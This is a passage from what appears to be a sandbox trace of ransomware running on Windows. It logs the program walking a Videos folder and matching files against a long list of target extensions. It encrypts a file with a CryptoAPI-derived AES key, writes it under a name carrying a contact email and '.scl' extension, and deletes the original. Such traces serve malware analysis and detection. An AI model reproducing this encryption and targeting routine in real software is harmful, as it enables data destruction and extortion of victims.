o.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0201.203] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.203] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.203] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ac
	[0201.207] ReadFile (in: hFile=0x3ac, lpBuffer=0xfe11a0, nNumberOfBytesToRead=0xaf71, lpNumberOfBytesRead=0x187f10, lpOverlapped=0x0 | out: lpBuffer=0xfe11a0*, lpNumberOfBytesRead=0x187f10*=0xaf71, lpOverlapped=0x0) returned 1
	[0201.210] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.211] CryptAcquireContextW (in: phProv=0x187ac0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x187ac0*=0xfcae68) returned 1
	[0201.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.213] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x187ac4 | out: phHash=0x187ac4) returned 1
	[0201.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.213] CryptHashData (hHash=0xfb8fb0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0201.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.213] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb8fb0, dwFlags=0x1, phKey=0x187ac8 | out: phKey=0x187ac8*=0xfb9430) returned 1
	[0201.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.213] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x187adc*=0xaf71, dwBufLen=0xaf71 | out: pbData=0x0*, pdwDataLen=0x187adc*=0xaf80) returned 1
	[0201.215] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.215] RtlMoveMemory (in: Destination=0xfec120, Source=0xfe11a0, Length=0xaf71 | out: Destination=0xfec120) 
	[0201.215] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.215] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfec120*, pdwDataLen=0x187abc*=0xaf71, dwBufLen=0xaf80 | out: pbData=0xfec120*, pdwDataLen=0x187abc*=0xaf80) returned 1
	[0201.217] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.217] CryptDestroyKey (hKey=0xfb9430) returned 1
	[0201.217] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.217] CryptDestroyHash (hHash=0xfb8fb0) returned 1
	[0201.217] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.218] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0201.218] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.218] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187ad8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187ad8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.218] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.219] GetUserNameA (in: lpBuffer=0x1879bc, pcbBuffer=0x187ad4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187ad4) returned 1
	[0201.220] wsprintfW (in: param_1=0x187af0, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 162
	[0201.220] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b0
	[0201.222] WriteFile (in: hFile=0x3b0, lpBuffer=0xfec120*, nNumberOfBytesToWrite=0xaf80, lpNumberOfBytesWritten=0x187f18, lpOverlapped=0x0 | out: lpBuffer=0xfec120*, lpNumberOfBytesWritten=0x187f18*=0xaf80, lpOverlapped=0x0) returned 1
	[0201.227] CloseHandle (hObject=0x3b0) returned 1
	[0201.227] CloseHandle (hObject=0x3ac) returned 1
	[0201.227] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf")) returned 1
	[0201.234] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf")) returned 0
	[0201.234] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18f3e1c0, ftCreationTime.dwHighDateTime=0x1d973a3, ftLastAccessTime.dwLowDateTime=0x79f3cb60, ftLastAccessTime.dwHighDateTime=0x1d97426, ftLastWriteTime.dwLowDateTime=0x79f3cb60, ftLastWriteTime.dwHighDateTime=0x1d97426, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="cbrqJym", cAlternateFileName="")) returned 1
	[0201.234] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6814550, ftCreationTime.dwHighDateTime=0x1d97619, ftLastAccessTime.dwLowDateTime=0x8afa0320, ftLastAccessTime.dwHighDateTime=0x1d97642, ftLastWriteTime.dwLowDateTime=0x8afa0320, ftLastWriteTime.dwHighDateTime=0x1d97642, nFileSizeHigh=0x0, nFileSizeLow=0xc615, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="Ct2vYov-inyodole.avi", cAlternateFileName="CT2VYO~1.AVI")) returned 1
	[0201.234] lstrcmpW (lpString1="Ct2vYov-inyodole.avi", lpString2="..") returned 1
	[0201.234] lstrcmpW (lpString1="Ct2vYov-inyodole.avi", lpString2=".") returned 1
	[0201.234] lstrcpyW (in: lpString1=0x1889b4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\"
	[0201.234] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\", lpString2="Ct2vYov-inyodole.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\Ct2vYov-inyodole.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\Ct2vYov-inyodole.avi"
	[0201.235] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\Ct2vYov-inyodole.avi") returned 132
	[0201.235] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.235] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\Ct2vYov-inyodole.avi", cchLength=0x84 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\ct2vyov-inyodole.avi") returned 0x84
	[0201.235] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.235] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\ct2vyov-inyodole.avi", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.235] lstrcpyW (in: lpString1=0x18855c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\ct2vyov-inyodole.avi" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\ct2vyov-inyodole.avi") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\ct2vyov-inyodole.avi"
	[0201.235] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\ct2vyov-inyodole.avi") returned 132
	[0201.235] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.320] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.320] StrStrW (lpFirst=".avi", lpSrch=".") returned=".avi"
	[0201.320] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.320] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".avi") returned 0x0
	[0201.321] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1642c310, ftCreationTime.dwHighDateTime=0x1d97204, ftLastAccessTime.dwLowDateTime=0xe7224640, ftLastAccessTime.dwHighDateTime=0x1d97673, ftLastWriteTime.dwLowDateTime=0xe7224640, ftLastWriteTime.dwHighDateTime=0x1d97673, nFileSizeHigh=0x0, nFileSizeLow=0x957f, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="vuzp5x 8.flv", cAlternateFileName="VUZP5X~1.FLV")) returned 1
	[0201.321] lstrcmpW (lpString1="vuzp5x 8.flv", lpString2="..") returned 1
	[0201.321] lstrcmpW (lpString1="vuzp5x 8.flv", lpString2=".") returned 1
	[0201.321] lstrcpyW (in: lpString1=0x1889b4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\"
	[0201.321] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\", lpString2="vuzp5x 8.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\vuzp5x 8.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\vuzp5x 8.flv"
	[0201.321] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\vuzp5x 8.flv") returned 124
	[0201.321] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.321] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\vuzp5x 8.flv", cchLength=0x7c | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv") returned 0x7c
	[0201.321] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
